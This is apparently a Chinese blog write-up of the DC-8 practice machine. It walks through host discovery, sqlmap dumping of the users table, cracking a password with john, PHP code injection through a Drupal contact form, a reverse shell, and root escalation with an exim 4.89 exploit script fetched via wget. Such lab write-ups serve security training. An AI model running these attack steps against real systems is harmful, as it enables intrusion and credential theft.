DC-8打靶记录

GTL-JU Lv3

一、信息收集

主机发现

使用arp协议扫描网段存活主机

1
arp-scan -l

image-20231013102205326

发现目标主机ip 192.168.113.166

端口扫描

1
nmap -sV 192.168.113.166

image-20231013102331058

根据端口扫描可以开放了22和80端口

二、漏洞挖掘与利用

访问目标靶机对应的web服务

image-20231013102519182

对web服务功能进行测试

image-20231013102609658

可以看到details对应着不同的nid

那么这里可能与数据库有交互,可能存在sql注入

测试sql注入

image-20231013102709364

使结果为假

image-20231013102728131

可以看到构造为真和为假结果是不一样的

这里存在sql注入

使用sqlmap进行漏洞利用

爆数据库

1
sqlmap http://192.168.113.166/?nid=1 -dbs 

image-20231013102933115

爆表名

1
sqlmap http://192.168.113.166/?nid=1 -D d7db -tables

image-20231013103149465

数据库中有一个users表

爆users表数据

1
sqlmap http://192.168.113.166/?nid=1 -D d7db -T users --dump

image-20231013103357916

1
sqlmap -u http://192.168.113.166/?nid=1 --batch -D "d7db" -T "users" -C "name,pass" --dump

image-20231013103455169

这里密码是加密了

这里使用john进行解密

image-20231013104407354

但是只破解开了john的密码是turtle

然后就是找用户登录的页面了

这里通过dirsearch进行目录扫描

image-20231013104725291

发现了usr登录路由

使用我们获得的账号密码进行登录

image-20231013104807222

成功登录

下面我们要找的就是能够进行php代码执行的地方

然后在contact us找到一个可以编辑php代码的地方

image-20231013111141149

image-20231013111318359

这里可以编辑php代码

我们这里先使用phpinfo测试代码是否会被执行

image-20231013111353686

输入信息提交

image-20231013111406365

可以看到代码执行成功了

那我们这里可以写入shell,拿下服务器权限

但是这里我们并不知道写入shell的路径

所以我们这里通过反弹shell拿下服务器权限

image-20231013111530050

kali开启监听

image-20231013111548138

image-20231013111646930

反弹shell成功

1
python -c "import pty;pty.spawn('/bin/bash')"

输入命令进入交互模式

image-20231013111830274

我们现在是普通用户权限

三、提权

要想拿下这台服务器就要进行提权

最常用的就是suid提权

1
find / -user root -perm -4000 -print 2>/dev/null

使用find命令查找具有suid权限的命令

image-20231013111952640

我们可以看到exim4这个命令有s权限位

查看以学exim4版本

image-20231013112720640

可以看到是4.89的版本

使用searchsploit工具查找exim版本存在的漏洞

image-20231013112901158

将利于脚本下载到攻击机

image-20231013113238319

然后我们要把脚本传到目标靶机上

这里再攻击机上面开一个web服务

通过wget命令将文件下载到目标靶机

image-20231013113324119

image-20231013113346767

提升脚本权限

image-20231013113434045

执行脚本提升权限

1
./46996.sh -m netcat

image-20231013113548959

image-20231013113608247

可以看到成功提升到root权限

  • 标题: DC-8打靶记录
  • 作者: GTL-JU
  • 创建于: 2023-10-13 18:51:22
  • 更新于: 2023-10-13 18:55:17
  • 链接: https://gtl-ju.github.io/2023/10/13/DC-8打靶记录/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。